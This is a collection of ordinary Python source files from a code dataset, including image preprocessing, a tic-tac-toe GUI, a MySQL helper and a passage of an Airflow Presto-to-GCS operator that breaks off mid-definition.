+{"seq_id":"413373878","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plot\nimport os\nimport json\nimport copy\nimport time\nimport shutil\nfrom dataUtils import shutildata\n\n\ndef cut(img):\n # img = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 17, 6)\n img = copy.deepcopy(img)\n img = np.asarray(img)\n img[img > 127] = 255\n img[img <= 127] = 1\n img[img == 255] = 0\n\n cols = np.sum(img, 0)\n rows = np.sum(img, 1)\n # print(cols)\n\n x1 = 0\n y1 = 0\n y2, x2 = img.shape\n y2 -= 1\n x2 -= 1\n\n for i in range(len(cols)):\n if cols[i] > 0:\n x1 = i\n break\n\n for i in range(len(cols)):\n if cols[len(cols) - 1 - i] > 0:\n x2 = len(cols) - 1 - i\n break\n\n for i in range(len(rows)):\n if rows[i] > 0:\n y1 = i\n break\n\n for i in range(len(rows)):\n if rows[len(rows) - 1 - i] > 0:\n y2 = len(rows) - 1 - i\n break\n\n return x1, x2, y1, y2\n\n\ndef resize(img):\n width, height = img.shape\n if width > height:\n wider = (width - height) // 2\n img=cv2.copyMakeBorder(img,0,0,wider,wider,cv2.BORDER_CONSTANT, value=[255, 255, 255])\n\n elif height>width:\n wider=(height - width)//2\n img=cv2.copyMakeBorder(img, wider, wider,0,0, cv2.BORDER_CONSTANT, value=[255, 255, 255])\n return img\n\n# a-z\ndef makeOringinData(path):\n datapath=\"E:\\\\PythonProject\\\\CNN_Pinyin/Data/originData/\"\n if os.path.exists(datapath):\n shutil.rmtree(datapath)\n\n os.mkdir(datapath)\n\n with open('num_char.json', 'r') as f:\n dict = json.loads(f.read())\n\n for i in os.listdir(path):\n char = i\n pre_name=dict[str(char)]+'_'\n print(pre_name)\n imgPath = path + char + '/'\n count = 0\n savaPath = datapath+ char + '/'\n print(savaPath)\n\n dirlist=os.listdir(imgPath)\n if len(dirlist) == 0:\n continue\n\n if os.path.exists(savaPath):\n shutil.rmtree(savaPath)\n\n if not os.path.exists(savaPath):\n os.mkdir(savaPath)\n\n for i in dirlist:\n img = cv2.imread(imgPath + i, 0)\n temp=img\n print(i)\n try:\n width,height=img.shape\n except:\n continue\n if not width==height:\n x1, x2, y1, y2 = cut(img)\n if x1 == x2 or y1 == y2:\n continue\n print(x1, x2, y1, y2)\n temp = img[y1:y2, x1:x2]\n temp=resize(temp)\n temp = cv2.resize(temp, (28, 28))\n\n cv2.imwrite(savaPath + pre_name + str(count) + '.jpg', temp)\n count += 1\n\n\nif __name__ == '__main__':\n\n path = 'C:\\\\Users\\\\MarkXu\\\\Desktop\\\\dst\\\\chars/'\n makeOringinData(path)\n shutildata('Data/originData/', 'Data/train/', 'Data/test/')\n\n\n\n","sub_path":"MakeData.py","file_name":"MakeData.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"607256855","text":"import numpy as np\nimport mercantile as m\n\ndef single_point(row,bound,deltax,deltay):\n\tfactorx = (row[0] - bound.west) / deltax\n\tfactory = (bound.north - row[1]) / deltay\n\n\txval = int(factorx * 4096)\n\tyval = int(factory * 4096)\n\n\treturn [xval,yval]\n\ndef get_convert_values(key):\n\tz,x,y = str.split(key,'/')[1:]\n\n\tbound = m.bounds(m.Tile(int(x), int(y), int(z)))\n\tdeltax,deltay = (bound.east - bound.west),(bound.north - bound.south)\n\n\treturn bound,deltax,deltay\n\n\ndef convert_all(key,coordss):\n\t#newlist = []\n\tbound,deltax,deltay = get_convert_values(key)\n\t#for coords in coordss:\n\treturn [[single_point(i,bound,deltax,deltay) for i in coords] for coords in coordss]\n\t#return newlist\n","sub_path":"python_vtile/coords.py","file_name":"coords.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"579115373","text":"from setuptools import setup\n\nMAJOR = 0\nMINOR = 1\nRELEASE = 5\n\nsetup(\n name=\"Thalassa\",\n version=\"%s.%s.%s\" % (MAJOR, MINOR, RELEASE),\n description=\"TBD\",\n url=\"https://github.com/Arrekin/Thalassa\",\n author=\"Daniel Misior\",\n packages=[\n \"thalassa\",\n \"thalassa.database\",\n ],\n install_requires=[\n \"Twisted\",\n \"sqlalchemy\",\n \"greenstalk\"\n ],\n)\n","sub_path":"ThalassaCore/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"395824898","text":"# import speech_recognition as sr\nimport os\n# from gtts import gTTS\nimport warnings\nimport calendar\nimport random\nimport wikipedia\nimport datetime\n# from playsound import playsound\nimport pytz\nimport autocorrect\n\n\n# ignoring warnings\nwarnings.filterwarnings('ignore')\n\nspell = autocorrect.Speller(lang='en')\n\n# # recording audio and return it as a string\n# def record_audio():\n\n# # record audio\n# r = sr.Recognizer() # Recognizer object\n\n# # opening mic to record\n# with sr.Microphone() as source:\n# print('Say Something')\n# audio = r.listen(source)\n\n# data = \"\"\n# try:\n# data = r.recognize_google(audio)\n# print(data)\n# except sr.UnknownValueError: # check for unknown errors\n# return ('Speech not recognised')\n# except sr.RequestError:\n# return ('You got disconnected, please try again !')\n\n# return data\n\n# # function to convert text to speech\n# def assistant_response(text):\n# if text == \"\":\n# text = \"Sorry\"\n# t_t_s = gTTS(text=text, lang = 'en', slow = False)\n\n# # getting current path\n# current_path = os.path.realpath(__file__)\n# # saving audio\n# t_t_s.save(current_path[:-9].replace('\\\\','/') + \"/audio_response/assistant_reply.mp3\")\n\n# playsound(current_path[:-9].replace('\\\\','/') + \"/audio_response/assistant_reply.mp3\")\n\n\n\n# check it to wake up\ndef wake_up(text):\n wake_words = [\"hey buddy\",\"hi buddy\",\"hello buddy\",\"listen buddy\"]\n for word in wake_words:\n if word in text.lower():\n return True\n\n return False\n\n# get date\ndef getDate():\n\n now = datetime.datetime.now(pytz.timezone('Asia/Kolkata'))\n my_date = datetime.datetime.today()\n weekday = calendar.day_name[my_date.weekday()]\n month = now.strftime(\"%B\")\n\n date_today = now.strftime(\"%d\")\n\n if date_today == '1':\n date_today += 'st'\n elif date_today == '2':\n date_today += 'nd'\n elif date_today == '3':\n date_today += 'rd'\n else:\n date_today += 'th'\n\n return f\"Today is {weekday} ,{month} {(date_today)} {now.year}\"\n\n# get time\ndef getTime():\n\n now = datetime.datetime.now(pytz.timezone('Asia/Kolkata'))\n hr = now.hour\n minute = now.minute\n mer = \"a.m.\"\n\n if hr >= 12:\n mer = 'p.m.'\n hr = int(hr) - 12\n \n\n return f\"Its {hr} : {minute} {mer}\"\n\n# greetings\ndef greeting(text):\n\n # user inputs\n greets = ['hi','hello','hey','greetings','wassup','what\\'s up','whats up','hello','hey there']\n\n # buddy response\n my_greets = ['hi','hello','hey','greetings','wassup','what\\'s up','whats up','hello','hey there']\n\n for word in greets:\n if word in text.lower():\n return random.choice(my_greets) + '.'\n\n return ''\n\ndef end_conv(text):\n\n # user inputs\n greets = ['bye','see you','goodbye','good bye','exit','leave','go','tata','see ya']\n\n # buddy response\n my_greets = ['bye','see you later',\"see you soon\",\"your are really cool\",\"will talk to you later\",\"byeee\",'goodbye','good bye','tata','see ya']\n\n for word in greets:\n if word in text.lower():\n return random.choice(my_greets) + '.'\n\n return ''\n\ndef getName(text):\n wordList = text.split()\n return text\n for i in range(len(wordList)):\n if i+3 <= len(wordList) - 1 and wordList[i].lower() == 'who' and wordList[i] == 'is':\n return wordList[i+2] + ' ' + wordList[i+3]\n elif i+2 <= len(wordList) - 1 and wordList[i].lower() == 'who' and wordList[i] == 'is':\n return wordList[i+2]\n\ndef spell_check(word_list):\n # checked_list = []\n for i in range(len(word_list)):\n word_list[i] = spell(word_list[i])\n return \" 
\".join(word_list)\n\n# search for keywords\n# def wiki_search(text):\n\n\ndef get_emoji():\n\n # user inputs\n my_icons=[ \"😀\", \"😃\", \"😄\", \"😁\", \"😆\", \"😅\", \"😂\", \"🤣\", \"☺️\", \"😊\", \"😇\", \"🙂\", \"🙃\", \"😉\", \"😌\", \"😍\", \"🥰\", \"😘\", \"😗\", \"😙\", \"😚\", \"😋\", \"😛\", \"😝\", \"😜\", \"🤪\", \"🤨\", \"🧐\", \"🤓\", \"😎\", \"🤩\", \"🥳\", \"😏\", \"😒\", \"😞\", \"😔\", \"😟\", \"😕\", \"🙁\", \"☹️\", \"😣\", \"😖\", \"😫\", \"😩\", \"🥺\", \"😢\", \"😭\", \"😤\", \"😠\", \"😡\", \"🤬\", \"🤯\", \"😳\", \"🥵\", \"🥶\", \"😱\", \"😨\", \"😰\", \"😥\", \"😓\", \"🤗\", \"🤔\", \"🤭\", \"🤫\", \"🤥\", \"😶\", \"😐\", \"😑\", \"😬\", \"🙄\", \"😯\", \"😦\", \"😧\", \"😮\", \"😲\", \"🥱\", \"😴\", \"🤤\", \"😪\", \"😵\", \"🤐\", \"🥴\", \"🤢\", \"🤮\", \"🤧\", \"😷\", \"🤒\", \"🤕\", \"🤑\", \"🤠\", \"😈\", \"👿\", \"👹\", \"👺\", \"🤡\", \"💩\", \"👻\", \"💀\", \"☠️\", \"👽\", \"👾\", \"🤖\", \"🎃\", \"😺\", \"😸\", \"😹\", \"😻\", \"😼\", \"😽\", \"🙀\", \"😿\", \"😾\" ]\n \n\n return random.choice(my_icons)\n\n\n\n\n ","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"584855251","text":"from __future__ import print_function, division\nimport numpy as np\nfrom torch.utils.data import Dataset, DataLoader\nfrom game2048.game import Game\nfrom game2048.displays import Display\n\n\nclass myDataset(Dataset):\n\n def __init__(self):\n self.board = []\n self.direction = []\n\n def add(self, getboard, getdirection):\n self.board.append(getboard)\n self.direction.append(getdirection)\n\n def __len__(self):\n return len(self.board)\n\n def __getitem__(self, idx):\n myBoard = self.board[idx]\n myDirection = self.direction[idx]\n return myBoard, myDirection\n\n\ndef single_run(size, ds, AgentClass, **kwargs):\n game = Game(size, 2048)\n agent = AgentClass(game, display=Display(), **kwargs)\n agent.play(dataset=ds, verbose=False, train=1)\n\n\nif __name__ == '__main__':\n GAME_SIZE = 4\n N_TESTS = 1000\n\n '''====================\n Use your own agent here.'''\n from game2048.agents import ExpectiMaxAgent as TestAgent\n '''===================='''\n\n scores = []\n dataset = myDataset()\n for _ in range(N_TESTS):\n\n single_run(GAME_SIZE, ds=dataset, AgentClass=TestAgent)\n np.save(\"b16\", dataset.board)\n np.save(\"d16\", dataset.direction)\n print(len(dataset))\n\n","sub_path":"2048/game2048/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"34750387","text":"import mysql.connector\nimport pickle\n\nwith open(\"ward.pickle\",\"rb\") as picklefile:\n database_name=pickle.load(picklefile)['id']\nprint(database_name)\n\nclass database:\n def __init__(self,hostname,user,dbase,pword=\"\"):\n try:\n self.mydb=mysql.connector.connect(\n host=hostname,\n user=user,\n password=pword,\n )\n except Exception as e:\n print(\"Not Connected to database.\")\n print(e)\n\n def insertintowadatable(self,name,address,about):\n #INSERT INTO `smartward`.`ward_registration` (ID,Municipality,WardNo,State,Address,Phone,Email,IP_Address,LogoPath,Password) VALUES('1','A','B','2','sgjkf','8935734','C','576','231','123')\n mycursor=self.mydb.cursor()\n sql=\"INSERT INTO wada(wada_name,wada_address,wada_info) VALUES (%s,%s,%s)\"\n val=(name,address,about) \n mycursor.execute(sql,val) \n self.mydb.commit()\n print(\"insert successful.\")\n mycursor.close()\n\nclass database_signinwindow(database):\n def __init__(self,hostname,user,dbase,pword=\"\"):\n super().__init__(hostname,user,dbase,pword)\n self.mycursor=self.mydb.cursor()\n\n def createWardTable(self):\n try:\n #\"CREATE TABLE `departments` (\"\" `dept_no` char(4) NOT NULL,\"\" `dept_name` varchar(40) NOT NULL,\"\" PRIMARY KEY (`dept_no`), UNIQUE KEY `dept_name` (`dept_name`)\"\") ENGINE=InnoDB\"\n sql=\"CREATE TABLE `smartward`.`ward_registration` ( `ID` VARCHAR(30) NOT NULL , `Municipality` VARCHAR(75) NOT NULL , `WardNo` VARCHAR(5) NOT NULL , `State` VARCHAR(5) NOT NULL , `Address` VARCHAR(150) NOT NULL , `Phone` VARCHAR(15) NOT NULL , `Email` VARCHAR(50) NOT NULL , `IP_Address` VARCHAR(15) NOT NULL , `LogoPath` VARCHAR(150) NOT NULL , `Password` VARCHAR(16) NOT NULL , PRIMARY KEY (`ID`)) ENGINE = InnoDB\"\n self.mycursor.execute(sql)\n self.mydb.commit()\n print(\"table created.\")\n self.mycursor.close()\n except Exception as e:\n print(\"table already exists\")\n\n def checkValid(self,municipality,ward):\n sql=\"SELECT * FROM `smartward`.`ward_registration` WHERE Municipality=%s AND WardNo=%s\"\n self.mycursor.execute(sql,(municipality,ward))\n if(self.mycursor.fetchall()):\n return False\n return True\n\n def checkEmailValid(self,email):\n sql=\"SELECT * FROM `smartward`.`ward_registration` WHERE Email=%s\"\n self.mycursor.execute(sql,(email,))\n if(self.mycursor.fetchall()):\n return False\n return True\n\n def InsertIntoward_registrationTable(self,id,municipality,wardno,state,address,phone,email,ip,logopath,pword):\n try:\n sql=\"INSERT INTO `smartward`.`ward_registration` (ID,Municipality,WardNo,State,Address,Phone,Email,IP_Address,LogoPath,Password) VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n val=(id,municipality,wardno,state,address,phone,email,ip,logopath,pword)\n self.mycursor.execute(sql,val)\n self.mydb.commit()\n self.mycursor.close()\n return True\n except Exception:\n print(\"insert failed\")\n return False\n\n def checkLoginValidity(self,id,pswd):\n sql = \"SELECT * FROM `smartward`.`ward_registration` WHERE ID=%s OR Email=%s\"\n self.mycursor.execute(sql, (id,id))\n login_details=self.mycursor.fetchall()\n if(login_details):\n if(pswd==login_details[0][-1]):\n return login_details[0][-3],login_details[0][-4],login_details[0][0]\n return \"invalid\",\"\",\"\"\n\n def checkEmailValidity(self,email):\n sql = \"SELECT * FROM `smartward`.`ward_registration` WHERE Email=%s\"\n self.mycursor.execute(sql, (email,))\n return self.mycursor.fetchall()\n\n def updateIP(self,id,ip):\n try:\n sql=\"UPDATE `smartward`.`ward_registration` SET IP_Address=%s WHERE ID=%s OR Email=%s\"\n 
self.mycursor.execute(sql,(ip,id,id))\n self.mydb.commit()\n self.mycursor.close()\n except Exception:\n print(\"Ip update unsucessful\")\n\n def createDatabase(self):\n self.mycursor.execute(\"CREATE DATABASE 3hu4\")\n self.mydb.commit()\n self.mycursor.close()\n\nclass database_wardwindow(database):\n def __init__(self,hostname,user,dbase=database_name,pword=\"\"):\n super().__init__(hostname, user, dbase, pword)\n self.mycursor = self.mydb.cursor()\n try:\n self.mycursor.execute(\"CREATE DATABASE {0}\".format(dbase))\n self.mydb.commit()\n except Exception:\n pass\n self.mycursor.execute(\"USE {0}\".format(dbase))\n self.mydb.commit()\n\n\n def createFormTable(self,tablename):\n try:\n sql=\"CREATE TABLE {0} (RegDate VARCHAR(10) NOT NULL,RegNo VARCHAR(15) NOT NULL, PRIMARY KEY(RegNo)) ENGINE=InnoDB\".format(tablename)\n self.mycursor.execute(sql)\n self.mydb.commit()\n except Exception as e:\n print(e)\n return\n\n def addColumns(self,tablename,*columns):\n try:\n for column in columns:\n sql=\"ALTER TABLE {0} ADD COLUMN {1} VARCHAR(1600)\".format(tablename,column)\n self.mycursor.execute(sql)\n self.mydb.commit()\n except Exception:\n return\n\n def insertValues(self,tablename,columnandvaluselist):\n csv=columnandvaluselist\n print(csv)\n sql=\"INSERT INTO {0} ({1},{2}) VALUES ('{3}','{4}')\".format(tablename,csv[0],csv[2],csv[1],csv[3])\n self.mycursor.execute(sql)\n self.mydb.commit()\n for i in range(4,len(csv),2):\n sql=\"UPDATE {0} SET {1}='{2}' WHERE {3}='{4}'\".format(tablename,csv[i],csv[i+1],csv[0],csv[1])\n self.mycursor.execute(sql)\n self.mydb.commit()\n print(\"Ok\")\n\n def getRowCount(self,column,tablename,value):\n sql = \"SELECT {0} FROM {1} WHERE {0} LIKE '{2}'\".format(column,tablename,value)\n self.mycursor.execute(sql)\n rows=self.mycursor.fetchall()\n if(rows):\n return len(rows)\n return 0\n#a=database_wardwindow(\"localhost\",\"root\",\"3zxc3\")\n#a.createFormTable(\"gshs\")\n#a.addColumns(\"gshs\",\"Ajh\",\"sdkjjhv\",\"hjgd\")\n#print(a.getRowCount('RegDate','marriageregistration',\"2076/01/%\"))\n\n","sub_path":"Smartward/forms/sifaris/dbconnect.py","file_name":"dbconnect.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
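`insertValues` and `getRowCount` in the record above splice values into SQL with `str.format`, which breaks on quotes and is open to injection; `mysql.connector` placeholders (already used by `insertintowadatable`) avoid both problems because the driver escapes the values. A sketch assuming a reachable local MySQL server and the `wada` table from the record:

```python
import mysql.connector

# Assumed connection details; adjust host/user/password for a real server.
conn = mysql.connector.connect(host="localhost", user="root", password="")
cursor = conn.cursor()

name = "O'Neill Ward"  # the embedded quote would break string-formatted SQL
sql = "INSERT INTO wada (wada_name, wada_address, wada_info) VALUES (%s, %s, %s)"
cursor.execute(sql, (name, "Main Street", "demo row"))  # values escaped by the driver
conn.commit()

cursor.close()
conn.close()
```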
+{"seq_id":"454466255","text":"import tkinter as tk\nimport Functions4 as fn\n\nclass Main(tk.Frame):\n\n\tN = 3\n\tPlayer = \"x\"\n\tIndent = 3\n\tHeader = None\n\tPCFirst = True\n\tGameOver = False\n\tGameField = []\n\tButtons = []\n\tActive = False\n\tInMenu = True\n\n\tBackgroundColor = \"#3c3b3d\"\n\tSeparatorColor = \"#252526\"\n\n\tX = \"×\"\n\tO = \"○\"\n\n\tdef __init__(self, root):\n\t\tsuper().__init__(root)\n\t\tself.menu()\n\n\n\tdef computer_turn(self):\n\t\troot.update()\n\t\tif not self.GameOver:\n\t\t\tself.Header.configure(text=\"Thinking...\")\n\t\t\tif self.PCFirst:\n\t\t\t\tplayerFirst = False\n\t\t\telse:\n\t\t\t\tplayerFirst = True\n\t\t\tif self.Player == \"x\":\n\t\t\t\tActualPlayer = \"X\"\n\t\t\telse:\n\t\t\t\tActualPlayer = \"O\"\n\t\t\txy = fn.JarvisManager(self.GameField, ActualPlayer)\n\t\t\tprint(xy, self.Player)\n\t\t\ti = xy[0]\n\t\t\tj = xy[1]\n\t\t\tif self.Player == \"x\":\n\t\t\t\tself.Buttons[i][j].configure(text=self.X)\n\t\t\t\tself.GameField[i][j] = \"X\"\n\t\t\telse:\n\t\t\t\tself.Buttons[i][j].configure(text=self.O, anchor=tk.S)\n\t\t\t\tself.GameField[i][j] = \"O\"\n\t\t\tself.Header.configure(text=\"Your Turn\")\n\n\n\n\n\tdef def_win(self, Buttons):\n\t\tif not self.GameOver:\n\t\t\twinner = fn.CheckForWin(Buttons, self.N)\n\t\t\tif winner == 1:\n\t\t\t\tif self.PCFirst:\n\t\t\t\t\tself.Header.configure(text=\"PC Wins!\")\n\t\t\t\t\tself.restart_game()\n\t\t\t\telse:\n\t\t\t\t\tself.Header.configure(text=\"You Win!\")\n\t\t\t\t\tself.restart_game()\n\t\t\t\tself.GameOver = True\n\t\t\telif winner == -1:\n\t\t\t\tif self.PCFirst:\n\t\t\t\t\tself.Header.configure(text=\"You Win!\")\n\t\t\t\t\tself.restart_game()\n\t\t\t\telse:\n\t\t\t\t\tself.Header.configure(text=\"PC Wins!\")\n\t\t\t\t\tself.restart_game()\n\t\t\t\tself.GameOver = True\n\t\tif fn.Is_full(self.GameField) and not self.GameOver:\n\t\t\tself.GameOver = True\n\t\t\tself.Header.configure(text=\"Dead Heat(\")\n\t\t\tself.restart_game()\n\t\t\treturn\n\n\n\n\tdef set_letter(self, Buttons, i, j):\n\t\tif not self.GameOver:\n\t\t\tif Buttons[i][j].cget(\"text\") == \" \" and self.Active:\n\t\t\t\tif self.Player == \"x\":\n\t\t\t\t\tButtons[i][j].configure(text=self.X)\n\t\t\t\t\tself.GameField[i][j] = \"X\"\n\t\t\t\t\tself.def_win(Buttons)\n\t\t\t\t\t\n\t\t\t\t\tself.Player = \"o\"\n\t\t\t\t\tself.Active = False\n\t\t\t\t\tself.computer_turn()\n\t\t\t\t\tself.Active = True\n\t\t\t\t\tself.Player = \"x\"\n\t\t\t\telif self.Player == \"o\":\n\t\t\t\t\tButtons[i][j].configure(text=self.O, anchor=tk.S)\n\t\t\t\t\tself.GameField[i][j] = \"O\"\n\t\t\t\t\tself.def_win(Buttons)\n\t\t\t\t\tself.Player = \"x\"\n\t\t\t\t\tself.Active = False\n\t\t\t\t\tself.computer_turn()\n\t\t\t\t\tself.Active = True\n\t\t\t\t\tself.Player = \"o\"\n\t\t\t\t\t\n\t\t\tself.def_win(Buttons)\n\n\n\tdef restart_game(self):\n\t\tself.Active = False\n\t\tRestartButton = tk.Label(root, fg=\"#464547\", bg=self.SeparatorColor, font=(\"TkDefaultFont\", 20), text=\"Restart\")\n\t\tRestartButton.place(x=75, y=250, width=200, height=50)\n\t\tdef Clear(event):\n\t\t\tif not self.InMenu:\n\t\t\t\tN = self.N\n\t\t\t\tt = 1\n\t\t\t\tfor i in range(N):\n\t\t\t\t\tfor j in range(N):\n\t\t\t\t\t\tself.GameField[i][j] = t\n\t\t\t\t\t\tself.Buttons[i][j].destroy()\n\t\t\t\tself.Player = \"x\"\n\t\t\t\tself.Header = None\n\t\t\t\tself.PCFirst = True\n\t\t\t\tself.GameOver = False\n\t\t\t\tself.GameField = []\n\t\t\t\tself.Buttons = []\n\t\t\t\tself.Active = 
False\n\t\t\t\tself.MainField.destroy()\n\t\t\t\tRestartButton.configure(bg=self.BackgroundColor, fg=self.BackgroundColor)\n\t\t\t\tself.InMenu = True\n\t\t\t\tself.menu()\n\t\t\t\n\t\tRestartButton.bind(\"\", Clear)\n\n\n\tdef menu(self):\n\t\tself.Header = tk.Label(root, bg=self.BackgroundColor, fg=self.SeparatorColor, font=(\"TkDefaultFont\", 30), text=\"Who is first?\")\n\t\tself.Header.place(x=0, y=0, width=350, height=120)\n\t\tCompF = tk.Label(root, fg=\"#464547\", bg=self.SeparatorColor, font=(\"TkDefaultFont\", 20), text=\"Computer\")\n\t\tUsrF = tk.Label(root, fg=\"#464547\", bg=self.SeparatorColor, font=(\"TkDefaultFont\", 20), text=\"Player\")\n\t\tCompF.place(x=75, y=180, width=200, height=50)\n\t\tUsrF.place(x=75, y=270, width=200, height=50)\n\t\tdef setC(event):\n\t\t\tself.PCFirst = True\n\t\t\tself.Active = False\n\t\t\tself.init_main()\n\t\tdef setU(event):\n\t\t\tself.PCFirst = False\n\t\t\tself.Active = True\n\t\t\tself.init_main()\n\t\tCompF.bind(\"\", setC)\n\t\tUsrF.bind(\"\", setU)\n\n\n\tdef init_main(self):\n\t\tself.InMenu = False\n\t\tN = self.N\n\t\tIndent = self.Indent\n\t\tButtonSize = int((330-Indent*(N-1))/N)\n\t\tself.Header.configure(font=(\"TkDefaultFont\", 40), text=\"Your Turn\")\n\n\t\tself.MainField = tk.Frame(bg=self.SeparatorColor)\n\t\tself.MainField.place(x=10, y=110, width=330, height=330)\n\n\t\tfor i in range(N):\n\t\t\tself.Buttons.append([])\n\t\t\tself.GameField.append([])\n\t\tt = 1\n\t\tfor i in range(N):\n\t\t\tfor j in range(N):\n\t\t\t\tself.GameField[i].append(t)\n\t\t\t\ttemp = tk.Label(self.MainField, bg=self.BackgroundColor, fg=self.SeparatorColor, font=(\"TkDefaultFont\", 76), text=\" \")\n\t\t\t\tself.Buttons[i].append(temp)\n\t\t\t\tX = ButtonSize*i + Indent*i\n\t\t\t\tY = ButtonSize*j + Indent*j\n\t\t\t\tself.Buttons[i][j].place(x=X, y=Y, width=ButtonSize, height=ButtonSize)\n\t\t\t\t#Buttons[i].bind(\"\", lambda x: self.set_letter(Buttons, i))\n\t\t\t\tt += 1\n\n\t\tself.Buttons[0][0].bind(\"\", lambda x: self.set_letter(self.Buttons, 0, 0))\n\t\tself.Buttons[0][1].bind(\"\", lambda x: self.set_letter(self.Buttons, 0, 1))\n\t\tself.Buttons[0][2].bind(\"\", lambda x: self.set_letter(self.Buttons, 0, 2))\n\t\tself.Buttons[1][0].bind(\"\", lambda x: self.set_letter(self.Buttons, 1, 0))\n\t\tself.Buttons[1][1].bind(\"\", lambda x: self.set_letter(self.Buttons, 1, 1))\n\t\tself.Buttons[1][2].bind(\"\", lambda x: self.set_letter(self.Buttons, 1, 2))\n\t\tself.Buttons[2][0].bind(\"\", lambda x: self.set_letter(self.Buttons, 2, 0))\n\t\tself.Buttons[2][1].bind(\"\", lambda x: self.set_letter(self.Buttons, 2, 1))\n\t\tself.Buttons[2][2].bind(\"\", lambda x: self.set_letter(self.Buttons, 2, 2))\n\n\t\tif self.PCFirst:\n\t\t\t#self.Player = \"o\"\n\t\t\tself.Header.configure(text=\"Thinking...\")\n\t\t\tself.computer_turn()\n\t\t\tself.Active = True\n\t\t\tself.Player = \"o\"\n\n\n\t\n\t\t\n\n\n\n\n\t\t\n\n\nroot = tk.Tk()\napp = Main(root)\napp.pack()\nroot.title(\"Крестики нолики\")\nroot.geometry(\"350x450+500+500\")\nroot.configure(background=app.BackgroundColor)\n\n\n\nroot.mainloop()","sub_path":"Python/Tkinter/TickTackToe/Game4.py","file_name":"Game4.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"56821128","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\nfrom __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Any\n\nfrom airflow.providers.google.cloud.transfers.sql_to_gcs import BaseSQLToGCSOperator\nfrom airflow.providers.presto.hooks.presto import PrestoHook\n\nif TYPE_CHECKING:\n from prestodb.client import PrestoResult\n from prestodb.dbapi import Cursor as PrestoCursor\n\n\nclass _PrestoToGCSPrestoCursorAdapter:\n \"\"\"\n An adapter that adds additional feature to the Presto cursor.\n\n The implementation of cursor in the prestodb library is not sufficient.\n The following changes have been made:\n\n * The poke mechanism for row. You can look at the next row without consuming it.\n * The description attribute is available before reading the first row. Thanks to the poke mechanism.\n * the iterator interface has been implemented.\n\n A detailed description of the class methods is available in\n `PEP-249 `__.\n \"\"\"\n\n def __init__(self, cursor: PrestoCursor):\n self.cursor: PrestoCursor = cursor\n self.rows: list[Any] = []\n self.initialized: bool = False\n\n @property\n def description(self) -> list[tuple]:\n \"\"\"\n This read-only attribute is a sequence of 7-item sequences.\n\n Each of these sequences contains information describing one result column:\n\n * ``name``\n * ``type_code``\n * ``display_size``\n * ``internal_size``\n * ``precision``\n * ``scale``\n * ``null_ok``\n\n The first two items (``name`` and ``type_code``) are mandatory, the other\n five are optional and are set to None if no meaningful values can be provided.\n \"\"\"\n if not self.initialized:\n # Peek for first row to load description.\n self.peekone()\n return self.cursor.description\n\n @property\n def rowcount(self) -> int:\n \"\"\"The read-only attribute specifies the number of rows.\"\"\"\n return self.cursor.rowcount\n\n def close(self) -> None:\n \"\"\"Close the cursor now.\"\"\"\n self.cursor.close()\n\n def execute(self, *args, **kwargs) -> PrestoResult:\n \"\"\"Prepare and execute a database operation (query or command).\"\"\"\n self.initialized = False\n self.rows = []\n return self.cursor.execute(*args, **kwargs)\n\n def executemany(self, *args, **kwargs):\n \"\"\"\n Prepare and execute a database operation.\n\n Prepare a database operation (query or command) and then execute it against\n all parameter sequences or mappings found in the sequence seq_of_parameters.\n \"\"\"\n self.initialized = False\n self.rows = []\n return self.cursor.executemany(*args, **kwargs)\n\n def peekone(self) -> Any:\n \"\"\"Return the next row without consuming it.\"\"\"\n self.initialized = True\n element = self.cursor.fetchone()\n self.rows.insert(0, element)\n return element\n\n def fetchone(self) -> Any:\n \"\"\"Fetch the next row 
of a query result set, returning a single sequence, or ``None``.\"\"\"\n if self.rows:\n return self.rows.pop(0)\n return self.cursor.fetchone()\n\n def fetchmany(self, size=None) -> list:\n \"\"\"\n Fetch the next set of rows of a query result, returning a sequence of sequences.\n\n An empty sequence is returned when no more rows are available.\n \"\"\"\n if size is None:\n size = self.cursor.arraysize\n\n result = []\n for _ in range(size):\n row = self.fetchone()\n if row is None:\n break\n result.append(row)\n\n return result\n\n def __next__(self) -> Any:\n \"\"\"\n Return the next row from the current SQL statement using the same semantics as ``.fetchone()``.\n\n A ``StopIteration`` exception is raised when the result set is exhausted.\n \"\"\"\n result = self.fetchone()\n if result is None:\n raise StopIteration()\n return result\n\n def __iter__(self) -> _PrestoToGCSPrestoCursorAdapter:\n \"\"\"Return self to make cursors compatible to the iteration protocol.\"\"\"\n return self\n\n\nclass PrestoToGCSOperator(BaseSQLToGCSOperator):\n \"\"\"Copy data from PrestoDB to Google Cloud Storage in JSON, CSV or Parquet format.\n\n :param presto_conn_id: Reference to a specific Presto hook.\n \"\"\"\n\n ui_color = \"#a0e08c\"\n\n type_map = {\n 